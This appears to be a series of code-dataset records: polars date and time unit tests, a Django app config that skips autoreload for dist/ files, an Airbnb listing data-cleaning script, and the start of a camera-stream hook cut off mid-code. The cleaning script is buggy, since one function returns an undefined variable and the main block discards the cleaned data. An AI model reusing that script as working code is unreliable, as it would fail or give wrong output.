\"bid_right\": pl.Float64,\n \"dates\": pl.Datetime(\"ms\"),\n \"ticker\": pl.Utf8,\n \"ticker_right\": pl.Utf8,\n }\n assert out.columns == [\"dates\", \"ticker\", \"bid\", \"ticker_right\", \"bid_right\"]\n assert (out[\"dates\"].cast(int)).to_list() == [\n 1464183000023,\n 1464183000038,\n 1464183000048,\n 1464183000048,\n 1464183000048,\n ]\n assert trades.join_asof(quotes, on=\"dates\", strategy=\"forward\")[\n \"bid_right\"\n ].to_list() == [720.5, 51.99, 720.5, 720.5, 720.5]\n\n out = trades.join_asof(quotes, on=\"dates\", by=\"ticker\")\n assert out[\"bid_right\"].to_list() == [51.95, 51.97, 720.5, 720.5, None]\n\n out = quotes.join_asof(trades, on=\"dates\", by=\"ticker\")\n assert out[\"bid_right\"].to_list() == [\n None,\n 51.95,\n 51.95,\n 51.95,\n 720.92,\n 98.0,\n 720.92,\n 51.95,\n ]\n assert quotes.join_asof(trades, on=\"dates\", strategy=\"backward\", tolerance=\"5ms\")[\n \"bid_right\"\n ].to_list() == [51.95, 51.95, None, 51.95, 98.0, 98.0, None, None]\n assert quotes.join_asof(trades, on=\"dates\", strategy=\"forward\", tolerance=\"5ms\")[\n \"bid_right\"\n ].to_list() == [51.95, 51.95, None, None, 720.77, None, None, None]\n\n\ndef test_lambda_with_python_datetime_return_type() -> None:\n df = pl.DataFrame({\"timestamp\": [1284286794, 1234567890]})\n\n assert df.with_column(\n pl.col(\"timestamp\").apply(lambda x: datetime(2010, 9, 12)).alias(\"my_date_time\")\n )[\"my_date_time\"].to_list() == [\n datetime(2010, 9, 12),\n datetime(2010, 9, 12),\n ]\n\n\ndef test_timelike_init() -> None:\n durations = [timedelta(days=1), timedelta(days=2)]\n dates = [date(2022, 1, 1), date(2022, 1, 2)]\n datetimes = [datetime(2022, 1, 1), datetime(2022, 1, 2)]\n\n for ts in [durations, dates, datetimes]:\n s = pl.Series(ts)\n assert s.to_list() == ts\n\n\ndef test_duration_filter() -> None:\n date_df = pl.DataFrame(\n {\n \"start_date\": [date(2022, 1, 1), date(2022, 1, 1), date(2022, 1, 1)],\n \"end_date\": [date(2022, 1, 7), date(2022, 2, 20), date(2023, 1, 1)],\n }\n ).with_column((pl.col(\"end_date\") - pl.col(\"start_date\")).alias(\"time_passed\"))\n\n assert date_df.filter(pl.col(\"time_passed\") < timedelta(days=30)).shape[0] == 1\n assert date_df.filter(pl.col(\"time_passed\") >= timedelta(days=30)).shape[0] == 2\n\n\ndef test_agg_logical() -> None:\n dates = [date(2001, 1, 1), date(2002, 1, 1)]\n s = pl.Series(dates)\n assert s.max() == dates[1]\n assert s.min() == dates[0]\n\n\n@no_type_check\ndef test_from_time_arrow() -> None:\n times = pa.array([10, 20, 30], type=pa.time32(\"s\"))\n times_table = pa.table([times], names=[\"times\"])\n\n assert 
pl.from_arrow(times_table).to_series().to_list() == [\n time(0, 0, 10),\n time(0, 0, 20),\n time(0, 0, 30),\n ]\n\n\ndef test_datetime_strptime_patterns() -> None:\n # note that all should be year first\n df = pl.Series(\n \"date\",\n [\n \"09-05-2019\",\n \"2018-09-05\",\n \"2018-09-05T04:05:01\",\n \"2018-09-05T04:24:01.9\",\n \"2018-09-05T04:24:02.11\",\n \"2018-09-05T14:24:02.123\",\n \"2018-09-05T14:24:02.123Z\",\n \"2019-04-18T02:45:55.555000000\",\n \"2019-04-18T22:45:55.555123\",\n ],\n ).to_frame()\n s = df.with_columns(\n [\n pl.col(\"date\")\n .str.strptime(pl.Datetime, fmt=None, strict=False)\n .alias(\"parsed\"),\n ]\n )[\"parsed\"]\n assert s.null_count() == 1\n assert s[0] is None\n\n\ndef test_timedelta_from() -> None:\n as_dict = {\n \"A\": [1, 2],\n \"B\": [timedelta(seconds=4633), timedelta(seconds=50)],\n }\n as_rows = [\n {\n \"A\": 1,\n \"B\": timedelta(seconds=4633),\n },\n {\n \"A\": 2,\n \"B\": timedelta(seconds=50),\n },\n ]\n assert pl.DataFrame(as_dict).frame_equal(pl.DataFrame(as_rows))\n\n\ndef test_duration_aggregations() -> None:\n df = pl.DataFrame(\n {\n \"group\": [\"A\", \"B\", \"A\", \"B\"],\n \"start\": [\n datetime(2022, 1, 1),\n datetime(2022, 1, 2),\n datetime(2022, 1, 3),\n datetime(2022, 1, 4),\n ],\n \"end\": [\n datetime(2022, 1, 2),\n datetime(2022, 1, 4),\n datetime(2022, 1, 6),\n datetime(2022, 1, 6),\n ],\n }\n )\n df = df.with_column((pl.col(\"end\") - pl.col(\"start\")).alias(\"duration\"))\n assert df.groupby(\"group\", maintain_order=True).agg(\n [\n pl.col(\"duration\").mean().alias(\"mean\"),\n pl.col(\"duration\").sum().alias(\"sum\"),\n pl.col(\"duration\").min().alias(\"min\"),\n pl.col(\"duration\").max().alias(\"max\"),\n pl.col(\"duration\").quantile(0.1).alias(\"quantile\"),\n pl.col(\"duration\").median().alias(\"median\"),\n pl.col(\"duration\").list().alias(\"list\"),\n ]\n ).to_dict(False) == {\n \"group\": [\"A\", \"B\"],\n \"mean\": [timedelta(days=2), timedelta(days=2)],\n \"sum\": [timedelta(days=4), timedelta(days=4)],\n \"min\": [timedelta(days=1), timedelta(days=2)],\n \"max\": [timedelta(days=3), timedelta(days=2)],\n \"quantile\": [timedelta(days=1), timedelta(days=2)],\n \"median\": [timedelta(days=2), timedelta(days=2)],\n \"list\": [\n [timedelta(days=1), timedelta(days=3)],\n [timedelta(days=2), timedelta(days=2)],\n ],\n }\n\n\ndef test_datetime_units() -> None:\n df = pl.DataFrame(\n {\n \"ns\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"ns\"\n ),\n \"us\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"us\"\n ),\n \"ms\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 5, 1), \"1mo\", time_unit=\"ms\"\n ),\n }\n )\n names = set(df.columns)\n\n for unit in DTYPE_TEMPORAL_UNITS:\n subset = names - {unit}\n\n assert (\n len(set(df.select([pl.all().exclude(pl.Datetime(unit))]).columns) - subset)\n == 0\n )\n\n\ndef test_datetime_instance_selection() -> None:\n test_data = {\n \"ns\": [datetime(2022, 12, 31, 1, 2, 3)],\n \"us\": [datetime(2022, 12, 31, 4, 5, 6)],\n \"ms\": [datetime(2022, 12, 31, 7, 8, 9)],\n }\n df = pl.DataFrame(\n data=test_data,\n columns=[\n (\"ns\", pl.Datetime(\"ns\")),\n (\"us\", pl.Datetime(\"us\")),\n (\"ms\", pl.Datetime(\"ms\")),\n ],\n )\n for tu in DTYPE_TEMPORAL_UNITS:\n res = df.select(pl.col([pl.Datetime(tu)])).dtypes\n assert res == [pl.Datetime(tu)]\n assert len(df.filter(pl.col(tu) == test_data[tu][0])) == 1\n\n\ndef test_unique_counts_on_dates() -> None:\n assert pl.DataFrame(\n {\n \"dt_ns\": 
pl.date_range(datetime(2020, 1, 1), datetime(2020, 3, 1), \"1mo\"),\n }\n ).with_columns(\n [\n pl.col(\"dt_ns\").dt.cast_time_unit(\"us\").alias(\"dt_us\"),\n pl.col(\"dt_ns\").dt.cast_time_unit(\"ms\").alias(\"dt_ms\"),\n pl.col(\"dt_ns\").cast(pl.Date).alias(\"date\"),\n ]\n ).select(\n pl.all().unique_counts().sum()\n ).to_dict(\n False\n ) == {\n \"dt_ns\": [3],\n \"dt_us\": [3],\n \"dt_ms\": [3],\n \"date\": [3],\n }\n\n\ndef test_groupby_rolling_by_ordering() -> None:\n # we must check that the keys still match the time labels after the rolling window\n # with a `by` argument.\n df = pl.DataFrame(\n {\n \"dt\": [\n datetime(2022, 1, 1, 0, 1),\n datetime(2022, 1, 1, 0, 2),\n datetime(2022, 1, 1, 0, 3),\n datetime(2022, 1, 1, 0, 4),\n datetime(2022, 1, 1, 0, 5),\n datetime(2022, 1, 1, 0, 6),\n datetime(2022, 1, 1, 0, 7),\n ],\n \"key\": [\"A\", \"A\", \"B\", \"B\", \"A\", \"B\", \"A\"],\n \"val\": [1, 1, 1, 1, 1, 1, 1],\n }\n )\n\n assert df.groupby_rolling(\n index_column=\"dt\",\n period=\"2m\",\n closed=\"both\",\n offset=\"-1m\",\n by=\"key\",\n ).agg(\n [\n pl.col(\"val\").sum().alias(\"sum val\"),\n ]\n ).to_dict(\n False\n ) == {\n \"key\": [\"A\", \"A\", \"A\", \"A\", \"B\", \"B\", \"B\"],\n \"dt\": [\n datetime(2022, 1, 1, 0, 1),\n datetime(2022, 1, 1, 0, 2),\n datetime(2022, 1, 1, 0, 5),\n datetime(2022, 1, 1, 0, 7),\n datetime(2022, 1, 1, 0, 3),\n datetime(2022, 1, 1, 0, 4),\n datetime(2022, 1, 1, 0, 6),\n ],\n \"sum val\": [2, 2, 1, 1, 2, 2, 1],\n }\n\n\ndef test_add_duration_3786() -> None:\n df = pl.DataFrame(\n {\n \"datetime\": [datetime(2022, 1, 1), datetime(2022, 1, 2)],\n \"add\": [1, 2],\n }\n )\n assert df.slice(0, 1).with_columns(\n [\n (pl.col(\"datetime\") + pl.duration(weeks=\"add\")).alias(\"add_weeks\"),\n (pl.col(\"datetime\") + pl.duration(days=\"add\")).alias(\"add_days\"),\n (pl.col(\"datetime\") + pl.duration(seconds=\"add\")).alias(\"add_seconds\"),\n (pl.col(\"datetime\") + pl.duration(milliseconds=\"add\")).alias(\n \"add_milliseconds\"\n ),\n (pl.col(\"datetime\") + pl.duration(hours=\"add\")).alias(\"add_hours\"),\n ]\n ).to_dict(False) == {\n \"datetime\": [datetime(2022, 1, 1, 0, 0)],\n \"add\": [1],\n \"add_weeks\": [datetime(2022, 1, 8, 0, 0)],\n \"add_days\": [datetime(2022, 1, 2, 0, 0)],\n \"add_seconds\": [datetime(2022, 1, 1, 0, 0, 1)],\n \"add_milliseconds\": [datetime(2022, 1, 1, 0, 0, 0, 1000)],\n \"add_hours\": [datetime(2022, 1, 1, 1, 0)],\n }\n\n\ndef test_groupby_rolling_by_() -> None:\n df = pl.DataFrame({\"group\": pl.arange(0, 3, eager=True)}).join(\n pl.DataFrame(\n {\n \"datetime\": pl.date_range(\n datetime(2020, 1, 1), datetime(2020, 1, 5), \"1d\"\n ),\n }\n ),\n how=\"cross\",\n )\n out = (\n df.sort(\"datetime\")\n .groupby_rolling(index_column=\"datetime\", by=\"group\", period=\"3d\")\n .agg([pl.count().alias(\"count\")])\n )\n\n expected = (\n df.sort([\"group\", \"datetime\"])\n .groupby_rolling(index_column=\"datetime\", by=\"group\", period=\"3d\")\n .agg([pl.count().alias(\"count\")])\n )\n assert out.sort([\"group\", \"datetime\"]).frame_equal(expected)\n assert out.to_dict(False) == {\n \"group\": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2],\n \"datetime\": [\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 2, 0, 0),\n 
datetime(2020, 1, 3, 0, 0),\n datetime(2020, 1, 4, 0, 0),\n datetime(2020, 1, 5, 0, 0),\n ],\n \"count\": [1, 2, 3, 3, 3, 1, 2, 3, 3, 3, 1, 2, 3, 3, 3],\n }\n\n\ndef test_quarter() -> None:\n assert pl.date_range(\n datetime(2022, 1, 1), datetime(2022, 12, 1), \"1mo\"\n ).dt.quarter().to_list() == [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4]\n\n\ndef test_date_offset() -> None:\n out = pl.DataFrame(\n {\"dates\": pl.date_range(datetime(2000, 1, 1), datetime(2020, 1, 1), \"1y\")}\n ).with_columns(\n [\n pl.col(\"dates\").dt.offset_by(\"1y\").alias(\"date_plus_1y\"),\n pl.col(\"dates\").dt.offset_by(\"-1y2mo\").alias(\"date_min\"),\n ]\n )\n\n assert (out[\"date_plus_1y\"].dt.day() == 1).all()\n assert (out[\"date_min\"].dt.day() == 1).all()\n assert out[\"date_min\"].to_list() == [\n datetime(1998, 11, 1, 0, 0),\n datetime(1999, 11, 1, 0, 0),\n datetime(2000, 11, 1, 0, 0),\n datetime(2001, 11, 1, 0, 0),\n datetime(2002, 11, 1, 0, 0),\n datetime(2003, 11, 1, 0, 0),\n datetime(2004, 11, 1, 0, 0),\n datetime(2005, 11, 1, 0, 0),\n datetime(2006, 11, 1, 0, 0),\n datetime(2007, 11, 1, 0, 0),\n datetime(2008, 11, 1, 0, 0),\n datetime(2009, 11, 1, 0, 0),\n datetime(2010, 11, 1, 0, 0),\n datetime(2011, 11, 1, 0, 0),\n datetime(2012, 11, 1, 0, 0),\n datetime(2013, 11, 1, 0, 0),\n datetime(2014, 11, 1, 0, 0),\n datetime(2015, 11, 1, 0, 0),\n datetime(2016, 11, 1, 0, 0),\n datetime(2017, 11, 1, 0, 0),\n datetime(2018, 11, 1, 0, 0),\n ]\n\n\ndef test_sorted_unique() -> None:\n assert (\n pl.DataFrame(\n [pl.Series(\"dt\", [date(2015, 6, 24), date(2015, 6, 23)], dtype=pl.Date)]\n )\n .sort(\"dt\")\n .unique()\n ).to_dict(False) == {\"dt\": [date(2015, 6, 23), date(2015, 6, 24)]}\n\n\ndef test_time_zero_3828() -> None:\n assert pl.Series(values=[time(0)], dtype=pl.Time).to_list() == [time(0)]\n\n\ndef test_time_microseconds_3843() -> None:\n in_val = [time(0, 9, 11, 558332)]\n s = pl.Series(in_val)\n assert s.to_list() == in_val\n\n\ndef test_year_empty_df() -> None:\n df = pl.DataFrame(pl.Series(name=\"date\", dtype=pl.Date))\n assert df.select(pl.col(\"date\").dt.year()).dtypes == [pl.Int32]\n\n\ndef test_sum_duration() -> None:\n assert pl.DataFrame(\n [\n {\"name\": \"Jen\", \"duration\": timedelta(seconds=60)},\n {\"name\": \"Mike\", \"duration\": timedelta(seconds=30)},\n {\"name\": \"Jen\", \"duration\": timedelta(seconds=60)},\n ]\n ).select(\n [pl.col(\"duration\").sum(), pl.col(\"duration\").dt.seconds().alias(\"sec\").sum()]\n ).to_dict(\n False\n ) == {\n \"duration\": [timedelta(seconds=150)],\n \"sec\": [150],\n }\n\n\ndef test_supertype_timezones_4174() -> None:\n df = pl.DataFrame(\n {\n \"dt\": pl.date_range(datetime(2020, 3, 1), datetime(2020, 5, 1), \"1mo\"),\n }\n ).with_columns(\n [\n pl.col(\"dt\").dt.with_time_zone(\"Europe/London\").suffix(\"_London\"),\n ]\n )\n\n # test if this runs without error\n date_to_fill = df[\"dt_London\"][0]\n df.with_column(df[\"dt_London\"].shift_and_fill(1, date_to_fill))\n\n\ndef test_weekday() -> None:\n # monday\n s = pl.Series([datetime(2020, 1, 6)])\n\n time_units: list[TimeUnit] = [\"ns\", \"us\", \"ms\"]\n for tu in time_units:\n assert s.dt.cast_time_unit(tu).dt.weekday()[0] == 0\n\n assert s.cast(pl.Date).dt.weekday()[0] == 0\n\n\ndef test_from_dict_tu_consistency() -> None:\n tz = zoneinfo.ZoneInfo(\"PRC\")\n dt = datetime(2020, 8, 1, 12, 0, 0, tzinfo=tz)\n from_dict = pl.from_dict({\"dt\": [dt]})\n from_dicts = pl.from_dicts([{\"dt\": dt}])\n\n assert from_dict.dtypes == from_dicts.dtypes\n\n\ndef test_date_parse_omit_day() -> None:\n df = 
pl.DataFrame({\"month\": [\"2022-01\"]})\n assert df.select(pl.col(\"month\").str.strptime(pl.Date, fmt=\"%Y-%m\"))[0, 0] == date(\n 2022, 1, 1\n )\n assert df.select(pl.col(\"month\").str.strptime(pl.Datetime, fmt=\"%Y-%m\"))[\n 0, 0\n ] == datetime(2022, 1, 1)\n\n\ndef test_shift_and_fill_group_logicals() -> None:\n df = pl.from_records(\n [\n (date(2001, 1, 2), \"A\"),\n (date(2001, 1, 3), \"A\"),\n (date(2001, 1, 4), \"A\"),\n (date(2001, 1, 3), \"B\"),\n (date(2001, 1, 4), \"B\"),\n ],\n columns=[\"d\", \"s\"],\n )\n assert df.select(\n pl.col(\"d\").shift_and_fill(-1, pl.col(\"d\").max()).over(\"s\")\n ).dtypes == [pl.Date]\n\n\ndef test_date_arr_concat() -> None:\n expected = {\"d\": [[date(2000, 1, 1), date(2000, 1, 1)]]}\n\n # type date\n df = pl.DataFrame({\"d\": [date(2000, 1, 1)]})\n assert df.select(pl.col(\"d\").arr.concat(pl.col(\"d\"))).to_dict(False) == expected\n # type list[date]\n df = pl.DataFrame({\"d\": [[date(2000, 1, 1)]]})\n assert df.select(pl.col(\"d\").arr.concat(pl.col(\"d\"))).to_dict(False) == expected\n\n\ndef test_date_timedelta() -> None:\n df = pl.DataFrame({\"date\": pl.date_range(date(2001, 1, 1), date(2001, 1, 3), \"1d\")})\n assert df.with_columns(\n [\n (pl.col(\"date\") + timedelta(days=1)).alias(\"date_plus_one\"),\n (pl.col(\"date\") - timedelta(days=1)).alias(\"date_min_one\"),\n ]\n ).to_dict(False) == {\n \"date\": [date(2001, 1, 1), date(2001, 1, 2), date(2001, 1, 3)],\n \"date_plus_one\": [date(2001, 1, 2), date(2001, 1, 3), date(2001, 1, 4)],\n \"date_min_one\": [date(2000, 12, 31), date(2001, 1, 1), date(2001, 1, 2)],\n }\n\n\ndef test_datetime_string_casts() -> None:\n df = pl.DataFrame(\n {\n \"x\": [1661855445123],\n \"y\": [1661855445123456],\n \"z\": [1661855445123456789],\n },\n columns=[\n (\"x\", pl.Datetime(\"ms\")),\n (\"y\", pl.Datetime(\"us\")),\n (\"z\", pl.Datetime(\"ns\")),\n ],\n )\n assert df.select(\n [pl.col(\"x\").dt.strftime(\"%F %T\").alias(\"w\")]\n + [pl.col(d).cast(str) for d in df.columns]\n ).rows() == [\n (\n \"2022-08-30 10:30:45\",\n \"2022-08-30 10:30:45.123\",\n \"2022-08-30 10:30:45.123456\",\n \"2022-08-30 10:30:45.123456789\",\n )\n ]\n\n\ndef test_short_formats() -> None:\n s = pl.Series([\"20202020\", \"2020\"])\n assert s.str.strptime(pl.Date, \"%Y\", strict=False).to_list() == [\n None,\n date(2020, 1, 1),\n ]\n assert s.str.strptime(pl.Date, \"%foo\", strict=False).to_list() == [None, None]\n\n\ndef test_iso_year() -> None:\n dt = datetime(2022, 1, 1, 7, 8, 40)\n assert pl.Series([dt]).dt.iso_year()[0] == 2021\n\n\ndef test_invalid_date_parsing_4898() -> None:\n assert pl.Series([\"2022-09-18\", \"2022-09-50\"]).str.strptime(\n pl.Date, \"%Y-%m-%d\", strict=False\n ).to_list() == [date(2022, 9, 18), None]\n\n\ndef test_cast_timezone() -> None:\n assert pl.DataFrame({\"a\": [datetime(2022, 9, 25, 14)]}).with_column(\n pl.col(\"a\")\n .dt.with_time_zone(\"America/New_York\")\n .dt.cast_time_zone(\"UTC\")\n .alias(\"b\")\n ).to_dict(False) == {\n \"a\": [datetime(2022, 9, 25, 14, 0)],\n \"b\": [datetime(2022, 9, 25, 18, 0)],\n }\n assert pl.DataFrame({\"a\": [datetime(2022, 9, 25, 18)]}).with_column(\n pl.col(\"a\")\n .dt.with_time_zone(\"UTC\")\n .dt.cast_time_zone(\"America/New_York\")\n .alias(\"b\")\n ).to_dict(False) == {\n \"a\": [datetime(2022, 9, 25, 18, 0)],\n \"b\": [datetime(2022, 9, 25, 14, 0)],\n 
}\n","repo_name":"koga25/polars-private","sub_path":"py-polars/tests/unit/test_datelike.py","file_name":"test_datelike.py","file_ext":"py","file_size_in_byte":47608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16683885915","text":"import logging\nfrom pathlib import Path\n\nfrom django.apps import AppConfig\nfrom django.utils.autoreload import file_changed\n\nautoreload_logger = logging.getLogger(\"django.utils.autoreload\")\n\n\ndef skip_dist(sender, file_path: Path, **kwargs): # pragma: no cover\n \"\"\"\n Don't restart the dev server for changes in the /dist folder. Otherwise the server\n goes down while webpack hot-reloads the frontend.\n \"\"\"\n if \"dist/\" in str(file_path):\n autoreload_logger.info(f\"Skipping autoreload for {file_path}\")\n return True\n\n\nclass ApiConfig(AppConfig):\n name = \"metecho.api\"\n verbose_name = \"API\"\n\n def ready(self):\n super().ready()\n file_changed.connect(skip_dist, dispatch_uid=\"Skip dist autoreload\")\n","repo_name":"SFDO-Tooling/Metecho","sub_path":"metecho/api/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"16"} +{"seq_id":"18478987376","text":"import ast\nimport pandas as pd\nimport re\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\n\ndef remove_rows_with_missing_ratings(listings):\n \n '''\n The function removes rows with missing ratings from a given dataframe.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame object that contains data about listings. It likely has\n multiple columns, including one named \"Value_rating\" and possibly a column named \"Unnamed: 19\". The\n function is designed to remove rows from the DataFrame where the \"Value_rating\" column has missing\n values\n \n Returns\n -------\n the updated \"listings\" dataframe after removing rows with missing ratings.\n '''\n \n listings = listings.drop('Unnamed: 19', axis=1)\n listings = listings.dropna(subset=['Value_rating'])\n \n \n return listings\n\n\ndef combine_description_strings(listings):\n \n '''\n The function `combine_description_strings` takes a DataFrame of listings, drops rows with missing\n descriptions, removes a specific listing, converts strings of lists to actual lists, removes\n specific parts from the description, and joins the remaining description strings.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame containing information about different listings. 
It is\n assumed that the DataFrame has a column named \"Description\" which contains strings describing each\n listing.\n \n Returns\n -------\n the modified \"listings\" dataframe.\n '''\n \n listings = listings.dropna(subset=['Description'])\n \n # deleting 1 listing - poor data entry\n listings = listings[listings['ID'] != '4c917b3c-d693-4ee4-a321-f5babc728dc9']\n \n # strings of a list of strings changed to list of strings\n listings['Description'] = listings['Description'].apply(ast.literal_eval)\n \n delete_these_parts = ['About this space', 'The space', 'Other things to note', 'Guest access', '']\n for part in delete_these_parts:\n listings['Description'] = listings['Description'].apply(lambda x: [item for item in x if item != part])\n \n listings['Description'] = listings['Description'].apply(lambda x: ' '.join(x) if isinstance(x, list) else x)\n \n \n return listings\n\n\ndef combine_amenities_strings(listings):\n \n '''\n The function `combine_amenities_strings` takes a DataFrame `listings` and performs several\n operations to clean and combine the strings in the 'Amenities' column.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a DataFrame that contains information about different listings. It\n likely has columns such as \"Amenities\" which contains a list of amenities for each listing. The\n function \"combine_amenities_strings\" takes this DataFrame as input and performs some operations on\n the \"Amen\n \n Returns\n -------\n the modified 'listings' dataframe with the 'Amenities' column updated.\n '''\n \n # strings of a list of strings changed to list of strings\n listings['Amenities'] = listings['Amenities'].apply(ast.literal_eval)\n \n #all 'Unavailable: TV/nTV' elements to 'Unavailable: TV', delete newline and second repeat\n listings['Amenities'] = listings['Amenities'].apply(lambda amenities: [item.split('\\n')[0] if item.startswith('Unavailable') else item for item in amenities])\n\n delete_these_parts = ['What this place offers', '']\n for part in delete_these_parts:\n listings['Amenities'] = listings['Amenities'].apply(lambda x: [item for item in x if item != part])\n \n listings['Amenities'] = listings['Amenities'].apply(lambda x: '. '.join(x) if isinstance(x, list) else x)\n \n return listings\n\n\ndef set_default_feature_values(listings):\n \n '''\n The function sets default values for specific features in a listings dataset.\n \n Parameters\n ----------\n listings\n The parameter \"listings\" is a dictionary or a data structure that contains information about\n different listings. 
Each listing has features such as \"guests\", \"beds\", \"bathrooms\", and \"bedrooms\".\n \n Returns\n -------\n the updated \"listings\" dictionary with default values filled in for any missing values in the\n \"guests\", \"beds\", \"bathrooms\", and \"bedrooms\" features.\n '''\n \n default_value = 1\n features = [\"guests\", \"beds\", \"bathrooms\", \"bedrooms\"]\n \n for feature in features:\n listings[feature] = listings[feature].fillna(default_value)\n \n return listings\n\n\ndef replace_newlines(text):\n \n '''\n The function `replace_newlines` replaces consecutive newlines in a text with either a dot and a\n space or a single space, depending on whether there is a non-alphanumeric character in front of the\n newlines.\n \n Parameters\n ----------\n text\n The `text` parameter is a string that represents the text that you want to modify.\n \n Returns\n -------\n the modified text with consecutive newlines replaced either with a dot and a space or with a single\n space, depending on whether there is a non-alphanumeric character in front of the newlines.\n '''\n \n # Replace consecutive newlines with a dot and a space if no non-alphanumeric character in front\n text = re.sub(r'(?<!\\W)\\n+', '. ', text)\n \n # Replace consecutive newlines with a single space if a non-alphanumeric character is in front\n text = re.sub(r'(?<=\\W)\\n+', ' ', text)\n \n return text\n\n\ndef clean_tabular_data(listings):\n \n '''\n The function `clean_tabular_data` takes a dataframe of listings, performs various cleaning and\n preprocessing steps, and returns a standardized version of the data.\n \n Parameters\n ----------\n listings\n The `listings` parameter is a DataFrame containing tabular data.\n \n Returns\n -------\n the standardized and encoded tabular data.\n '''\n \n listings = remove_rows_with_missing_ratings(listings)\n listings = combine_description_strings(listings)\n listings = set_default_feature_values(listings)\n listings['Description'] = listings['Description'].apply(replace_newlines)\n listings = combine_amenities_strings(listings)\n \n return standardized_data\n\n\ndef load_airbnb(label, num_only=True):\n \n '''\n The function `load_airbnb` loads tabular data from a CSV file and returns the features and labels as\n NumPy arrays, with an option to include only numerical columns.\n \n Parameters\n ----------\n label\n The label parameter is the column name of the target variable in the dataset. It is the variable\n that you want to predict or classify.\n num_only, optional\n The `num_only` parameter is a boolean flag that determines whether only numerical columns should be\n included in the features or all columns (including categorical columns). If `num_only` is set to\n `True`, only numerical columns will be included in the features. 
If `num_only` is set to `\n \n Returns\n -------\n The function `load_airbnb` returns two values: `features` and `labels`.\n '''\n\n clean_data = pd.read_csv('tabular_data/clean_tabular_data.csv')\n clean_data.reset_index(drop=True, inplace=True) # Reset the index\n\n labels = clean_data[label].values # Convert to NumPy array\n\n if num_only:\n num_columns = clean_data.select_dtypes(exclude=['object']).columns\n\n if label in num_columns:\n features = clean_data[num_columns].drop(columns=[label]).values # Convert to NumPy array\n else:\n features = clean_data[num_columns].values # Convert to NumPy array\n\n else:\n features = clean_data.drop(columns=[label]).values # Convert to NumPy array\n\n return features, labels\n\n\n\nif __name__ == \"__main__\":\n \n listings = pd.read_csv('tabular_data/listing.csv')\n standardized_data = clean_tabular_data(listings)\n \n # Encode ordinal features\n standardized_data['bathrooms'] = standardized_data['bathrooms'].astype(int)\n standardized_data['guests'] = standardized_data['guests'].astype(int)\n standardized_data['beds'] = standardized_data['beds'].astype(int)\n standardized_data['bedrooms'] = standardized_data['bedrooms'].astype(int)\n \n # standardize the numeric features\n numeric_columns = listings[['bathrooms', 'guests', 'beds', 'bedrooms', 'Cleanliness_rating', 'Accuracy_rating', 'Communication_rating', 'Location_rating', 'Check-in_rating', 'Value_rating', 'amenities_count']]\n scaler = StandardScaler()\n scaler.fit(numeric_columns)\n standardized_columns = scaler.transform(numeric_columns)\n standardized_data = listings.copy()\n standardized_data[numeric_columns.columns] = standardized_columns\n\n # Encode 'Category' labels\n label_encoder = LabelEncoder()\n encoded_labels = label_encoder.fit_transform(standardized_data['Category'])\n standardized_data['Category'] = encoded_labels\n \n standardized_data.to_csv(\"tabular_data/clean_tabular_data.csv\", index=False)\n","repo_name":"raweru/modelling-airbnbs-property-listing-dataset-","sub_path":"tabular_data.py","file_name":"tabular_data.py","file_ext":"py","file_size_in_byte":9056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24410918983","text":"from pathlib import Path\n\nfrom jinja2 import Template\nfrom starlette.routing import Route, Router\n\nfrom opsi.manager.manager_schema import Hook\nfrom opsi.manager.netdict import NT_AVAIL, NetworkDict\nfrom opsi.util.templating import LiteralTemplate\n\nfrom .mjpeg import MjpegResponse\n\n\nclass CamHook(Hook):\n # Matches both \"camera.mjpg\" and \"camera.mjpeg\"\n ROUTE_URL = \"/{func}.mjpe?g\" # Route to bind to\n STREAM_URL = \"/{func}.mjpeg\" # Canonical path\n\n path = Path(__file__).parent\n with open(path / \"mjpeg.html\") as f:\n TEMPLATE = f.read()\n TEMPLATE = Template(TEMPLATE)\n\n CAMERA_NAME = \"OpenSight: {func}\"\n CAMERA_URL_NT = f\"mjpeg:{{url}}{STREAM_URL}?\"\n CAMERA_URL_WEB = f\"{{url}}{STREAM_URL}\"\n\n def __init__(self):\n super().__init__()\n\n self.app = Router()\n if NT_AVAIL:\n self.netdict = NetworkDict(\"/CameraPublisher\")\n self.funcs = {} # {name: route}\n self.cams = {} # {name: url}\n self.index_route = [Route(\"/\", LiteralTemplate(self.TEMPLATE, cams=self.cams))]\n self.listeners = {\"startup\": set(), \"shutdown\": set(), \"pipeline_update\": set()}\n\n self._update()\n\n def _update(self):\n self.app.routes = self.index_route + list(self.funcs.values())\n\n def endpoint(self, camserv):\n def response(request):\n return MjpegResponse(request, 
